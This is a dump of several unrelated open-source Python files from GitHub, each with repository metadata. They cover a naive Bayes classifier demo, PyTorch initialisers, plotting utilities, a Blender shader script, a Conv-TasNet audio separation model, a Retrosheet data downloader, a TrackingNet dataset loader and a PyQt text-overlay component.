np.array([1, -1])\n\n# 将数据集分为训练集和测试集\nX_train = np.concatenate([class1[:70], class2[:70], class3[:70]])\ny_train = np.concatenate([np.zeros(70), np.ones(70), 2 * np.ones(70)])\nX_test = np.concatenate([class1[70:], class2[70:], class3[70:]])\ny_test = np.concatenate([np.zeros(30), np.ones(30), 2 * np.ones(30)])\n\n# 计算每个类别的先验概率\nprior_probs = np.zeros(3)\nfor i in range(3):\n prior_probs[i] = np.sum(y_train == i) / y_train.shape[0]\n\n# 计算每个特征在每个类别中的条件概率\nmean_vectors = np.zeros((3, X_train.shape[1]))\nstd_vectors = np.zeros((3, X_train.shape[1]))\nfor i in range(3):\n mean_vectors[i] = np.mean(X_train[y_train == i], axis=0)\n std_vectors[i] = np.std(X_train[y_train == i], axis=0)\n\n# 预测测试集的标签\ny_pred = np.zeros(y_test.shape[0])\nfor i, x in enumerate(X_test):\n # 计算x在每个类别下的概率\n probs = np.zeros(3)\n for j in range(3):\n probs[j] = np.prod(1 / (np.sqrt(2 * np.pi) * std_vectors[j]) * np.exp(-(x - mean_vectors[j]) ** 2 / (2 * std_vectors[j] ** 2))) * prior_probs[j]\n y_pred[i] = np.argmax(probs)\n\n# 导入绘图库\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\n\n# 设置形状和颜色\nmarkers = ['o', '^', 's']\ncolors = ['red', 'green', 'blue']\ncmap = ListedColormap(colors)\n\n# 画出训练集\nfor i in range(3):\n plt.scatter(X_train[y_train == i, 0], X_train[y_train == i, 1], marker=markers[i], color=colors[i], alpha=0.5, label=f\"Class {i+1}\")\n\n# 画出测试集\nfor i in range(3):\n plt.scatter(X_test[y_test == i, 0], X_test[y_test == i, 1], marker=markers[i], color='white', edgecolors=colors[i], label=f\"Test Class {i+1}\")\n\n# 画出决策边界\nx1_min, x1_max = X_train[:, 0].min() - 1, X_train[:, 0].max() + 1\nx2_min, x2_max = X_train[:, 1].min() - 1, X_train[:, 1].max() + 1\nxx1, xx2 = np.meshgrid(np.linspace(x1_min, x1_max, 100), np.linspace(x2_min, x2_max, 100))\nZ = np.zeros((100, 100, 3))\nfor i in range(100):\n for j in range(100):\n probs = np.zeros(3)\n for k in range(3):\n probs[k] = np.prod(1 / (np.sqrt(2 * np.pi) * std_vectors[k]) * np.exp(-(np.array([xx1[i, j], xx2[i, j]]) - mean_vectors[k]) ** 2 / (2 * std_vectors[k] ** 2))) * prior_probs[k]\n Z[i, j, :] = probs / np.sum(probs)\nplt.imshow(Z, extent=[x1_min, x1_max, x2_min, x2_max], origin='lower', alpha=0.5, cmap=cmap)\n\n# 添加图例和标签\nplt.legend()\nplt.xlabel('Feature 1')\nplt.ylabel('Feature 2')\n\n# 计算准确率并显示在图的上方\naccuracy = np.sum(y_pred == y_test) / y_test.shape[0]\nplt.title(f\"Accuracy: {accuracy:.2f}\", fontsize=14, y=1.1)\n\n# 显示图像\nplt.show()","repo_name":"seagochen/MachineLearningDemo","sub_path":"03.NaiveBayesianNetwork.py","file_name":"03.NaiveBayesianNetwork.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"810887459","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n\ndef normalized_columns_initializer(weights, std=1.0):\n out = torch.randn(weights.size())\n out *= std / torch.sqrt(out.pow(2).sum(1, keepdim=True))\n return out\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1 and hasattr(m, 'weight'):\n weight_shape = list(m.weight.data.size())\n fan_in = np.prod(weight_shape[1:4])\n fan_out = np.prod(weight_shape[2:4]) * weight_shape[0]\n w_bound = np.sqrt(6. / (fan_in + fan_out))\n m.weight.data.uniform_(-w_bound, w_bound)\n m.bias.data.fill_(0)\n elif classname.find('Linear') != -1:\n weight_shape = list(m.weight.data.size())\n fan_in = weight_shape[1]\n fan_out = weight_shape[0]\n w_bound = np.sqrt(6. / (fan_in + fan_out))\n m.weight.data.uniform_(-w_bound, w_bound)\n m.bias.data.fill_(0)\n elif classname.find('LSTM') != -1:\n # weight_shape = list(m.weight.data.size())\n # fan_in = weight_shape[1]\n # fan_out = weight_shape[0]\n # w_bound = np.sqrt(6. / (fan_in + fan_out))\n # m.weight.data.uniform_(-w_bound, w_bound)\n m.bias_ih.data.fill_(0)\n m.bias_hh.data.fill_(0)\n\n\ndef layer_init(layer, w_scale=1.0):\n nn.init.orthogonal_(layer.weight.data)\n layer.weight.data.mul_(w_scale)\n nn.init.constant_(layer.bias.data, 0)\n return layer\n\n\ndef init_hidden_cell(in_size, device):\n hx = torch.zeros(1, in_size).to(device)\n cx = torch.zeros(1, in_size).to(device)\n return hx, cx\n\n","repo_name":"psavine42/juststuff","sub_path":"src/algo/init_custom.py","file_name":"init_custom.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7373067223","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport numpy as np\nimport seaborn as sns\n\n\ndef do_eda_plot_for_iris(iris_data):\n \"\"\"\n EDA 探索性数据分析\n \"\"\"\n category_color_dict = {\n 'Iris-setosa': 'red',\n 'Iris-versicolor': 'blue',\n 'Iris-virginica': 'green'\n }\n\n fig, axes = plt.subplots(2, 1, figsize=(8, 8))\n\n for category_name, category_color in category_color_dict.items():\n\n #\n iris_data[iris_data['Species'] == category_name].plot(ax=axes[0], kind='scatter',\n x='SepalLengthCm', y='SepalWidthCm', label=category_name,\n color=category_color)\n #\n iris_data[iris_data['Species'] == category_name].plot(ax=axes[1], kind='scatter',\n x='PetalLengthCm', y='PetalWidthCm', label=category_name,\n color=category_color)\n\n axes[0].set_xlabel('Sepal Length')\n axes[0].set_ylabel('Sepal Width')\n axes[0].set_title('Sepal Length vs Sepal Width')\n\n axes[1].set_xlabel('Petal Length')\n axes[1].set_ylabel('Petal Width')\n axes[1].set_title('Petal Length vs Petal Width')\n\n plt.tight_layout()\n plt.savefig('./iris_eda.png')\n plt.show()\n\n\ndef do_pair_plot_for_iris(iris_data):\n \"\"\"\n 瀵归涪灏捐姳鏁版嵁闆嗙殑鏍锋湰鐗瑰緛鍏崇郴杩涜鍙鍖�\n 鍙傛暟锛�\n - iris_data: 楦㈠熬鑺辨暟鎹泦\n \"\"\"\n g = sns.pairplot(data=iris_data[['SepalLengthCm', 'SepalWidthCm', 'PetalLengthCm', 'PetalWidthCm', 'Species']],\n hue='Species')\n plt.tight_layout()\n plt.show()\n g.savefig('./iris_pairplot.png')\n\n\ndef plot_knn_boundary(knn_model, X, y, fig_title, save_fig):\n \"\"\"\n 绘制分类边界\n \"\"\"\n h = .02 # step size in the mesh\n\n # Create color maps\n cmap_light = ListedColormap(['#FFAAAA', '#AAFFAA', '#AAAAFF'])\n cmap_bold = ListedColormap(['#FF0000', '#00FF00', '#0000FF'])\n\n # point in the mesh [x_min, x_max]x[y_min, y_max].\n x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n Z = knn_model.predict(np.c_[xx.ravel(), yy.ravel()])\n\n # Put the result into a color plot\n Z = Z.reshape(xx.shape)\n plt.figure()\n plt.pcolormesh(xx, yy, Z, cmap=cmap_light)\n\n # Plot also the training points\n plt.scatter(X[:, 0], X[:, 1], c=y, cmap=cmap_bold,\n edgecolor='k', s=20)\n plt.xlim(xx.min(), xx.max())\n plt.ylim(yy.min(), yy.max())\n plt.title(fig_title)\n\n plt.savefig(save_fig)\n\n plt.show()\n\n\ndef plot_feat_and_price(house_data):\n \"\"\"\n 绘制房价与其他指标的散点图\n \"\"\"\n feat_cols = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'sqft_above', 'sqft_basement']\n fig, axes = plt.subplots(2, 3, figsize=(15, 8)) # 2 rows,3 cols\n for i, feat_col in enumerate(feat_cols):\n house_data[[feat_col, 'price']].plot.scatter(x=feat_col, y='price', alpha=0.5,\n ax=axes[int(i / 3), i - 3 * int(i / 3)])\n plt.tight_layout()\n plt.savefig('./house_feat.png')\n plt.show()\n\n\ndef plot_fitting_line(linear_reg_model, X, y, fig_title, save_fig):\n \"\"\"\n 缁樺埗绾挎€ф嫙鍚堟洸绾�\n 鍙傛暟锛�\n linear_reg_model: 璁粌濂界殑绾挎€у洖褰掓ā鍨�\n X: 鏁版嵁闆嗙壒寰�\n y: 鏁版嵁闆嗘爣绛�\n fig_title: 鍥惧儚鍚嶇О\n save_fig: 淇濆瓨鍥惧儚鐨勮矾寰�\n \"\"\"\n # 绾挎€у洖褰掓ā鍨嬬殑绯绘暟\n coef = linear_reg_model.coef_\n\n # 绾挎€у洖褰掓ā鍨嬬殑鎴窛\n intercept = linear_reg_model.intercept_\n\n # 缁樺埗鏍锋湰鐐�\n plt.scatter(X, y, alpha=0.5)\n\n # 缁樺埗鎷熷悎绾�\n plt.plot(X, X * coef + intercept, c='red')\n\n plt.title(fig_title)\n plt.savefig(save_fig)\n plt.show()","repo_name":"crystal98tang/AI_demo","sub_path":"ai_utils.py","file_name":"ai_utils.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"4843000996","text":"import bpy\n\n\n\nmaterial_toon = bpy.data.materials.get(\"Toon02\")\nmaterial_outline = bpy.data.materials.get('Outline')\n\n#Ajoouter plusieurs shaders à un object (ici shder toon)\n\nobjects_scene = []\n\nfor obj in bpy.data.objects :\n if obj.type == \"MESH\":\n obj.select_set(True)\n# bpy.ops.object.material_slot_remove()\n objects_scene.append(obj)\n\n\nfor o in objects_scene:\n bpy.ops.object.material_slot_add()\n o.data.materials.append(material_toon)\n bpy.ops.object.material_slot_add()\n o.data.materials.append(material_outline)","repo_name":"OphelieAbb/Blender_python_stage_2021","sub_path":"BLENDER_python/ShaderToon.py","file_name":"ShaderToon.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"30643248468","text":"#!/usr/bin/env python3\n# This module is taken from: https://github.com/JusperLee/Conv-TasNet/blob/master/Conv_TasNet_Pytorch/Conv_TasNet.py\n\nimport torch\n\nDEFAULT_CONV_TASNET_CONF = {\n \"num_filters\": 512,\n \"filter_length\": 16,\n \"bottleneck_channels\": 128,\n \"conv_channels\": 512,\n \"kernel_size\": 3,\n \"num_blocks\": 8,\n \"num_layers\": 3,\n}\n\n\nclass ConvTasNet(torch.nn.Module):\n \"\"\"\n Conformer model\n \"\"\"\n\n @staticmethod\n def add_args(parser):\n parser.add_argument(\"--num-spk\", type=int, default=2)\n parser.add_argument(\"--num-noise\", type=int, default=1)\n parser.add_argument(\"--conv-tasnet-num-filters\", type=int, default=256)\n parser.add_argument(\"--conv-tasnet-filter-length\", type=int, default=16)\n parser.add_argument(\"--conv-tasnet-bottleneck-channels\", type=int, default=128)\n parser.add_argument(\"--conv-tasnet-conv-channels\", type=int, default=256)\n parser.add_argument(\"--conv-tasnet-kernel-size\", type=int, default=3)\n parser.add_argument(\"--conv-tasnet-num-blocks\", type=int, default=8)\n parser.add_argument(\"--conv-tasnet-num-layers\", type=int, default=3)\n parser.add_argument(\n \"--conv-tasnet-norm\", type=str, default=\"gln\", choices=[\"gln\", \"cln\", \"bn\"]\n )\n\n @classmethod\n def build_model(cls, conf):\n conv_tasnet_conf = {\n \"num_filters\": int(conf[\"conv_tasnet_num_filters\"]),\n \"filter_length\": int(conf[\"conv_tasnet_filter_length\"]),\n \"bottleneck_channels\": int(conf[\"conv_tasnet_bottleneck_channels\"]),\n \"conv_channels\": int(conf[\"conv_tasnet_conv_channels\"]),\n \"kernel_size\": int(conf[\"conv_tasnet_kernel_size\"]),\n \"num_blocks\": int(conf[\"conv_tasnet_num_blocks\"]),\n \"num_layers\": int(conf[\"conv_tasnet_num_layers\"]),\n \"norm\": conf[\"conv_tasnet_norm\"],\n }\n model = ConvTasNet(\n num_spk=conf[\"num_spk\"],\n num_noise=conf[\"num_noise\"],\n conv_tasnet_conf=conv_tasnet_conf,\n )\n return model\n\n def __init__(\n self,\n num_spk=2,\n num_noise=1,\n conv_tasnet_conf=DEFAULT_CONV_TASNET_CONF,\n activate=\"relu\",\n causal=False,\n ):\n N = conv_tasnet_conf[\"num_filters\"]\n L = conv_tasnet_conf[\"filter_length\"]\n B = conv_tasnet_conf[\"bottleneck_channels\"]\n H = conv_tasnet_conf[\"conv_channels\"]\n P = conv_tasnet_conf[\"kernel_size\"]\n X = conv_tasnet_conf[\"num_blocks\"]\n R = conv_tasnet_conf[\"num_layers\"]\n norm = conv_tasnet_conf[\"norm\"]\n\n super(ConvTasNet, self).__init__()\n # n x 1 x T => n x N x T\n self.encoder = Conv1D(1, N, L, stride=L // 2, padding=0)\n # n x N x T Layer Normalization of Separation\n self.LayerN_S = select_norm(\"cln\", N)\n # n x B x T Conv 1 x 1 of Separation\n self.BottleN_S = Conv1D(N, B, 1)\n # Separation block\n # n x B x T => n x B x T\n self.separation = self._Sequential_repeat(\n R, X, in_channels=B, out_channels=H, kernel_size=P, norm=norm, causal=causal\n )\n # n x B x T => n x 2*N x T\n self.gen_masks = Conv1D(B, (num_spk + num_noise) * N, 1)\n # n x N x T => n x 1 x L\n self.decoder = ConvTrans1D(N, 1, L, stride=L // 2)\n # activation function\n active_f = {\n \"relu\": torch.nn.ReLU(),\n \"sigmoid\": torch.nn.Sigmoid(),\n \"softmax\": torch.nn.Softmax(dim=0),\n }\n self.activation_type = activate\n self.activation = active_f[activate]\n self.num_spk = num_spk\n self.num_noise = num_noise\n\n def _Sequential_block(self, num_blocks, **block_kwargs):\n \"\"\"\n Sequential 1-D Conv Block\n input:\n num_block: how many blocks in every repeats\n **block_kwargs: parameters of Conv1D_Block\n \"\"\"\n Conv1D_Block_lists = [\n Conv1D_Block(**block_kwargs, dilation=(2 ** i)) for i in range(num_blocks)\n ]\n\n return torch.nn.Sequential(*Conv1D_Block_lists)\n\n def _Sequential_repeat(self, num_repeats, num_blocks, **block_kwargs):\n \"\"\"\n Sequential repeats\n input:\n num_repeats: Number of repeats\n num_blocks: Number of block in every repeats\n **block_kwargs: parameters of Conv1D_Block\n \"\"\"\n repeats_lists = [\n self._Sequential_block(num_blocks, **block_kwargs)\n for i in range(num_repeats)\n ]\n return torch.nn.Sequential(*repeats_lists)\n\n def forward(self, x):\n if x.dim() >= 3:\n raise RuntimeError(\n \"{} accept 1/2D tensor as input, but got {:d}\".format(\n self.__name__, x.dim()\n )\n )\n if x.dim() == 1:\n x = torch.unsqueeze(x, 0)\n # x: n x 1 x L => n x N x T\n w = self.encoder(x)\n # n x N x L => n x B x L\n e = self.LayerN_S(w)\n e = self.BottleN_S(e)\n # n x B x L => n x B x L\n e = self.separation(e)\n # n x B x L => n x (num_spk+num_noise)*N x L\n m = self.gen_masks(e)\n # n x N x L x num_spks\n m = torch.chunk(m, chunks=self.num_spk + self.num_noise, dim=1)\n # (num_spks + num_noise) x n x N x L\n m = self.activation(torch.stack(m, dim=0))\n d = [w * m[i] for i in range(self.num_spk + self.num_noise)]\n # decoder part (num_spks + num_noise) x n x L\n s = [\n self.decoder(d[i], squeeze=True)\n for i in range(self.num_spk + self.num_noise)\n ]\n return torch.stack(s[:-1], dim=1)\n\n\nclass GlobalLayerNorm(torch.nn.Module):\n \"\"\"\n Calculate Global Layer Normalization\n dim: (int or list or torch.Size) –\n input shape from an expected input of size\n eps: a value added to the denominator for numerical stability.\n elementwise_affine: a boolean value that when set to True,\n this module has learnable per-element affine parameters\n initialized to ones (for weights) and zeros (for biases).\n \"\"\"\n\n def __init__(self, dim, eps=1e-05, elementwise_affine=True):\n super(GlobalLayerNorm, self).__init__()\n self.dim = dim\n self.eps = eps\n self.elementwise_affine = elementwise_affine\n\n if self.elementwise_affine:\n self.weight = torch.nn.Parameter(torch.ones(self.dim, 1))\n self.bias = torch.nn.Parameter(torch.zeros(self.dim, 1))\n else:\n self.register_parameter(\"weight\", None)\n self.register_parameter(\"bias\", None)\n\n def forward(self, x):\n # x = N x C x L\n # N x 1 x 1\n # cln: mean,var N x 1 x L\n # gln: mean,var N x 1 x 1\n if x.dim() != 3:\n raise RuntimeError(\"{} accept 3D tensor as input\".format(self.__name__))\n\n mean = torch.mean(x, (1, 2), keepdim=True)\n var = torch.mean((x - mean) ** 2, (1, 2), keepdim=True)\n # N x C x L\n if self.elementwise_affine:\n x = self.weight * (x - mean) / torch.sqrt(var + self.eps) + self.bias\n else:\n x = (x - mean) / torch.sqrt(var + self.eps)\n return x\n\n\nclass CumulativeLayerNorm(torch.nn.LayerNorm):\n \"\"\"\n Calculate Cumulative Layer Normalization\n dim: you want to norm dim\n elementwise_affine: learnable per-element affine parameters\n \"\"\"\n\n def __init__(self, dim, elementwise_affine=True):\n super(CumulativeLayerNorm, self).__init__(\n dim, elementwise_affine=elementwise_affine\n )\n\n def forward(self, x):\n # x: N x C x L\n # N x L x C\n x = torch.transpose(x, 1, 2)\n # N x L x C == only channel norm\n x = super().forward(x)\n # N x C x L\n x = torch.transpose(x, 1, 2)\n return x\n\n\ndef select_norm(norm, dim):\n if norm == \"gln\":\n return GlobalLayerNorm(dim, elementwise_affine=True)\n if norm == \"cln\":\n return CumulativeLayerNorm(dim, elementwise_affine=True)\n elif norm == \"bn\":\n return torch.nn.BatchNorm1d(dim)\n else:\n raise ValueError(\"Unknown normalization: {}\".format(norm))\n\n\nclass Conv1D(torch.nn.Conv1d):\n \"\"\"\n Applies a 1D convolution over an input signal composed of several input planes.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Conv1D, self).__init__(*args, **kwargs)\n\n def forward(self, x, squeeze=False):\n # x: N x C x L\n if x.dim() not in [2, 3]:\n raise RuntimeError(\"{} accept 2/3D tensor as input\".format(self.__name__))\n x = super().forward(x if x.dim() == 3 else torch.unsqueeze(x, 1))\n if squeeze:\n x = torch.squeeze(x)\n return x\n\n\nclass ConvTrans1D(torch.nn.ConvTranspose1d):\n \"\"\"\n This module can be seen as the gradient of Conv1d with respect to its input.\n It is also known as a fractionally-strided convolution\n or a deconvolution (although it is not an actual deconvolution operation).\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ConvTrans1D, self).__init__(*args, **kwargs)\n\n def forward(self, x, squeeze=False):\n \"\"\"\n x: N x L or N x C x L\n \"\"\"\n if x.dim() not in [2, 3]:\n raise RuntimeError(\"{} accept 2/3D tensor as input\".format(self.__name__))\n x = super().forward(x if x.dim() == 3 else torch.unsqueeze(x, 1))\n if squeeze:\n x = torch.squeeze(x)\n return x\n\n\nclass Conv1D_Block(torch.nn.Module):\n \"\"\"\n Consider only residual links\n \"\"\"\n\n def __init__(\n self,\n in_channels=256,\n out_channels=512,\n kernel_size=3,\n dilation=1,\n norm=\"gln\",\n causal=False,\n ):\n super(Conv1D_Block, self).__init__()\n # conv 1 x 1\n self.conv1x1 = Conv1D(in_channels, out_channels, 1)\n self.PReLU_1 = torch.nn.PReLU()\n self.norm_1 = select_norm(norm, out_channels)\n # not causal don't need to padding, causal need to pad+1 = kernel_size\n self.pad = (\n (dilation * (kernel_size - 1)) // 2\n if not causal\n else (dilation * (kernel_size - 1))\n )\n # depthwise convolution\n self.dwconv = Conv1D(\n out_channels,\n out_channels,\n kernel_size,\n groups=out_channels,\n padding=self.pad,\n dilation=dilation,\n )\n self.PReLU_2 = torch.nn.PReLU()\n self.norm_2 = select_norm(norm, out_channels)\n self.Sc_conv = torch.nn.Conv1d(out_channels, in_channels, 1, bias=True)\n self.causal = causal\n\n def forward(self, x):\n # x: N x C x L\n # N x O_C x L\n c = self.conv1x1(x)\n # N x O_C x L\n c = self.PReLU_1(c)\n c = self.norm_1(c)\n # causal: N x O_C x (L+pad)\n # noncausal: N x O_C x L\n c = self.dwconv(c)\n # N x O_C x L\n if self.causal:\n c = c[:, :, : -self.pad]\n c = self.PReLU_2(c)\n c = self.norm_2(c)\n c = self.Sc_conv(c)\n return x + c\n","repo_name":"desh2608/css","sub_path":"css/models/conv_tasnet.py","file_name":"conv_tasnet.py","file_ext":"py","file_size_in_byte":11150,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"22"} +{"seq_id":"21147499960","text":"import io\nimport logging\nimport requests\nimport zipfile\n\nfrom glob import glob\nfrom typing import List\n\n\nlogger = logging.getLogger(__name__)\n\nlogging.basicConfig(\n format='%(asctime)s | %(name)s | %(levelname)s | %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.INFO,\n)\n\n\ndef get_retrosheet_events(\n years: List[int], data_dir: str\n ) -> List[str]:\n \n for year in years:\n url = f\"https://www.retrosheet.org/events/{year}eve.zip\"\n logger.info(f\"fetching data from {url}, saving to {data_dir}\")\n \n r = requests.get(url)\n z = zipfile.ZipFile(io.BytesIO(r.content))\n z.extractall(f\"{data_dir}/retrosheet\")\n\n data_paths = f\"{data_dir}/retrosheet/*.EV*\"\n\n retrosheet_events = []\n for data_path in glob(data_paths):\n retrosheet_events += open(data_path, \"r\").read().splitlines()\n\n return retrosheet_events\n\n\nif __name__ == \"__main__\":\n get_retrosheet_events([2020], \"/Users/timhealz/code/data\")","repo_name":"timhealz/retrosheet-processor","sub_path":"retrosheet-processor/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25570852576","text":"import os\nimport numpy as np\nimport pandas as pd\nimport path_config\nfrom datasets.data import Sequence, BaseDataset, SequenceList\n\n\ndef load_text_numpy(path, delimiter, dtype):\n if isinstance(delimiter, (tuple, list)):\n for d in delimiter:\n try:\n ground_truth_rect = np.loadtxt(path, delimiter=d, dtype=dtype)\n return ground_truth_rect\n except Exception:\n pass\n\n raise Exception(\"Could not read file {}\".format(path))\n else:\n ground_truth_rect = np.loadtxt(path, delimiter=delimiter, dtype=dtype)\n return ground_truth_rect\n\n\ndef load_text_pandas(path, delimiter, dtype):\n if isinstance(delimiter, (tuple, list)):\n for d in delimiter:\n try:\n ground_truth_rect = pd.read_csv(\n path,\n delimiter=d,\n header=None,\n dtype=dtype,\n na_filter=False,\n low_memory=False,\n ).values\n return ground_truth_rect\n except Exception:\n pass\n\n raise Exception(\"Could not read file {}\".format(path))\n else:\n ground_truth_rect = pd.read_csv(\n path,\n delimiter=delimiter,\n header=None,\n dtype=dtype,\n na_filter=False,\n low_memory=False,\n ).values\n return ground_truth_rect\n\n\ndef load_text(path, delimiter=\" \", dtype=np.float32, backend=\"numpy\"):\n if backend == \"numpy\":\n return load_text_numpy(path, delimiter, dtype)\n elif backend == \"pandas\":\n return load_text_pandas(path, delimiter, dtype)\n\n\ndef TrackingNetDataset():\n return TrackingNetClass().get_sequence_list()\n\n\nclass TrackingNetClass(BaseDataset):\n \"\"\" TrackingNet test set.\n\n Publication:\n TrackingNet: A Large-Scale Dataset and Benchmark for Object Tracking in the Wild.\n Matthias Mueller,Adel Bibi, Silvio Giancola, Salman Al-Subaihi and Bernard Ghanem\n ECCV, 2018\n https://ivul.kaust.edu.sa/Documents/Publications/2018/TrackingNet%20A%20Large%20Scale%20Dataset%20and%20Benchmark%20for%20Object%20Tracking%20in%20the%20Wild.pdf\n\n Download the dataset using the toolkit https://github.com/SilvioGiancola/TrackingNet-devkit.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.base_path = path_config.TRACKINGNET_PATH\n\n sets = \"TEST\"\n if not isinstance(sets, (list, tuple)):\n if sets == \"TEST\":\n sets = [\"TEST\"]\n elif sets == \"TRAIN\":\n sets = [\"TRAIN_{}\".format(i) for i in range(5)]\n\n self.sequence_list = self._list_sequences(self.base_path, sets)\n\n def get_sequence_list(self):\n return SequenceList(\n [\n self._construct_sequence(set, seq_name)\n for set, seq_name in self.sequence_list\n ]\n )\n\n def _construct_sequence(self, set, sequence_name):\n anno_path = \"{}/{}/anno/{}.txt\".format(self.base_path, set, sequence_name)\n\n ground_truth_rect = load_text(\n str(anno_path), delimiter=\",\", dtype=np.float64, backend=\"numpy\"\n )\n\n frames_path = \"{}/{}/frames/{}\".format(self.base_path, set, sequence_name)\n frame_list = [\n frame for frame in os.listdir(frames_path) if frame.endswith(\".jpg\")\n ]\n frame_list.sort(key=lambda f: int(f[:-4]))\n frames_list = [os.path.join(frames_path, frame) for frame in frame_list]\n\n return Sequence(\n sequence_name, frames_list, \"trackingnet\", ground_truth_rect.reshape(-1, 4)\n )\n\n def __len__(self):\n return len(self.sequence_list)\n\n def _list_sequences(self, root, set_ids):\n sequence_list = []\n\n for s in set_ids:\n anno_dir = os.path.join(root, s, \"anno\")\n sequences_cur_set = [\n (s, os.path.splitext(f)[0])\n for f in os.listdir(anno_dir)\n if f.endswith(\".txt\")\n ]\n\n sequence_list += sequences_cur_set\n\n return sequence_list\n","repo_name":"songheony/A3T","sub_path":"datasets/trackingnetdataset.py","file_name":"trackingnetdataset.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"22"} +{"seq_id":"43983665771","text":"from PIL import ImageEnhance, ImageFilter, ImageChops\nfrom PyQt5.QtGui import QColor, QFont\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nimport os\nimport logging\n\nfrom ..component import Component\nfrom ..toolkit.frame import FramePainter, PaintColor\n\nlog = logging.getLogger('AVP.Components.Text')\n\n\nclass Component(Component):\n name = 'Title Text'\n version = '1.0.1'\n\n def widget(self, *args):\n super().widget(*args)\n self.title = 'Text'\n self.alignment = 1\n self.titleFont = QFont()\n self.fontSize = self.height / 13.5\n\n self.page.comboBox_textAlign.addItem(\"Left\")\n self.page.comboBox_textAlign.addItem(\"Middle\")\n self.page.comboBox_textAlign.addItem(\"Right\")\n self.page.comboBox_textAlign.setCurrentIndex(int(self.alignment))\n self.page.spinBox_fontSize.setValue(int(self.fontSize))\n self.page.lineEdit_title.setText(self.title)\n self.page.pushButton_center.clicked.connect(self.centerXY)\n\n self.page.fontComboBox_titleFont.currentFontChanged.connect(self._sendUpdateSignal)\n # The QFontComboBox must be connected directly to the Qt Signal\n # which triggers the preview to update.\n # This unfortunately makes changing the font into a non-undoable action.\n # Must be something broken in the conversion to a ComponentAction\n\n self.trackWidgets({\n 'textColor': self.page.lineEdit_textColor,\n 'title': self.page.lineEdit_title,\n 'alignment': self.page.comboBox_textAlign,\n 'fontSize': self.page.spinBox_fontSize,\n 'xPosition': self.page.spinBox_xTextAlign,\n 'yPosition': self.page.spinBox_yTextAlign,\n 'fontStyle': self.page.comboBox_fontStyle,\n 'stroke': self.page.spinBox_stroke,\n 'strokeColor': self.page.lineEdit_strokeColor,\n 'shadow': self.page.checkBox_shadow,\n 'shadX': self.page.spinBox_shadX,\n 'shadY': self.page.spinBox_shadY,\n 'shadBlur': self.page.spinBox_shadBlur,\n }, colorWidgets={\n 'textColor': self.page.pushButton_textColor,\n 'strokeColor': self.page.pushButton_strokeColor,\n }, relativeWidgets=[\n 'xPosition', 'yPosition', 'fontSize',\n 'stroke', 'shadX', 'shadY', 'shadBlur'\n ])\n self.centerXY()\n\n def update(self):\n self.titleFont = self.page.fontComboBox_titleFont.currentFont()\n if self.page.checkBox_shadow.isChecked():\n self.page.label_shadX.setHidden(False)\n self.page.spinBox_shadX.setHidden(False)\n self.page.spinBox_shadY.setHidden(False)\n self.page.label_shadBlur.setHidden(False)\n self.page.spinBox_shadBlur.setHidden(False)\n else:\n self.page.label_shadX.setHidden(True)\n self.page.spinBox_shadX.setHidden(True)\n self.page.spinBox_shadY.setHidden(True)\n self.page.label_shadBlur.setHidden(True)\n self.page.spinBox_shadBlur.setHidden(True)\n\n def centerXY(self):\n self.setRelativeWidget('xPosition', 0.5)\n self.setRelativeWidget('yPosition', 0.521)\n\n def getXY(self):\n '''Returns true x, y after considering alignment settings'''\n fm = QtGui.QFontMetrics(self.titleFont)\n x = self.pixelValForAttr('xPosition')\n\n if self.alignment == 1: # Middle\n offset = int(fm.width(self.title)/2)\n x -= offset\n if self.alignment == 2: # Right\n offset = fm.width(self.title)\n x -= offset\n\n return x, self.yPosition\n\n def loadPreset(self, pr, *args):\n super().loadPreset(pr, *args)\n\n font = QFont()\n font.fromString(pr['titleFont'])\n self.page.fontComboBox_titleFont.setCurrentFont(font)\n\n def savePreset(self):\n saveValueStore = super().savePreset()\n saveValueStore['titleFont'] = self.titleFont.toString()\n return saveValueStore\n\n def previewRender(self):\n return self.addText(self.width, self.height)\n\n def properties(self):\n props = ['static']\n if not self.title:\n props.append('error')\n return props\n\n def error(self):\n return \"No text provided.\"\n\n def frameRender(self, frameNo):\n return self.addText(self.width, self.height)\n\n def addText(self, width, height):\n font = self.titleFont\n font.setPixelSize(self.fontSize)\n font.setStyle(QFont.StyleNormal)\n font.setWeight(QFont.Normal)\n font.setCapitalization(QFont.MixedCase)\n if self.fontStyle == 1:\n font.setWeight(QFont.DemiBold)\n if self.fontStyle == 2:\n font.setWeight(QFont.Bold)\n elif self.fontStyle == 3:\n font.setStyle(QFont.StyleItalic)\n elif self.fontStyle == 4:\n font.setWeight(QFont.Bold)\n font.setStyle(QFont.StyleItalic)\n elif self.fontStyle == 5:\n font.setStyle(QFont.StyleOblique)\n elif self.fontStyle == 6:\n font.setCapitalization(QFont.SmallCaps)\n\n image = FramePainter(width, height)\n x, y = self.getXY()\n log.debug('Text position translates to %s, %s', x, 